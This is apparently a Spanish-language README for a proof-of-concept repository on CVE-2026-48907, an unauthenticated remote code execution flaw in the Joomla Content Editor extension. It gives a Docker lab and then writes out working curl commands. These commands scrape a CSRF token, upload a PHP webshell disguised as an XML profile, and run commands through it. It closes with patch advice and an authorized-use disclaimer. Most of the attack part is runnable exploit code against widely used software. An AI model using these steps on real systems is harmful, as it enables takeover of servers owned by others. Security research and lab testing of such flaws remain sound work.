
PoC para CVE-2026-48907
PSsec Laboratorio educativo de investigación de seguridad para CVE-2026-48907.
CVE-2026-48907 es una vulnerabilidad crítica (CVSS 10.0) de ejecución remota de código no autenticada en JCE (Joomla Content Editor), la extensión de editor más instalada para Joomla, que afecta a todas las versiones ≤ 2.9.99.4.
El endpoint profiles.import acepta cargas de archivos sin ninguna autenticación. Un atacante puede subir un archivo PHP malicioso disfrazado de perfil XML, que se escribe en el directorio tmp/ del servidor y se ejecuta directamente a través de HTTP — sin necesidad de credenciales.
| Detalle | Valor |
|---|---|
| CVE | CVE-2026-48907 |
| Puntuación CVSS | 10.0 Crítico |
| Versiones afectadas | JCE ≤ 2.9.99.4 |
| Versiones corregidas | JCE ≥ 2.9.99.5 |
| En la lista KEV de CISA | Sí — 16 de junio de 2026 |
| Explotado activamente | Sí |
docker compose up -d
Abre http://localhost:8080 en tu navegador y completa el asistente de configuración con estas credenciales:
| Campo | Valor |
|---|---|
| Host de la base de datos | db |
| Nombre de la base de datos | joomla |
| Usuario de la base de datos |
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
Luego, en el Administrador de Joomla → Sistema → Extensiones → Instalar → sube el ZIP.
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
| sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
| head -n1)
curl -i -s -b cookies.txt -c cookies.txt \
-F "[email protected];type=application/xml" \
-F "task=profiles.import" \
-F "${TOKEN}=1" \
"$URL/index.php?option=com_jce"
curl -i -s -b cookies.txt -c cookies.txt \
"$URL/tmp/shell.xml.php?cmd=id"
Salida esperada: uid=33(www-data) gid=33(www-data)
| Archivo | Descripción |
|---|---|
docker-compose.yml | Levanta un Joomla 5.3.1 vulnerable + MySQL 8.0 |
shell.xml.php | Payload mínimo de webshell PHP |
instructions.txt | Notas de explotación paso a paso |
Actualiza JCE a la versión 2.9.99.5 o posterior de inmediato.
Aviso oficial del proveedor y parche gratuito para versiones antiguas de Joomla: Actualización de seguridad de JCE — joomlacontenteditor.net
Este repositorio está destinado estrictamente a fines educativos y de investigación de seguridad autorizada.
Las pruebas solo deben realizarse contra sistemas que sean de tu propiedad o para los que tengas permiso explícito por escrito. El uso no autorizado de este material contra sistemas que no te pertenecen es ilegal y poco ético. Los autores y Pansophical OU no aceptan ninguna responsabilidad por el mal uso de este contenido.
Este entorno de laboratorio es intencionalmente vulnerable. No lo expongas a internet ni a ninguna red no confiable.
Por PSsec
joomla |
| Contraseña de la base de datos | joomlapass |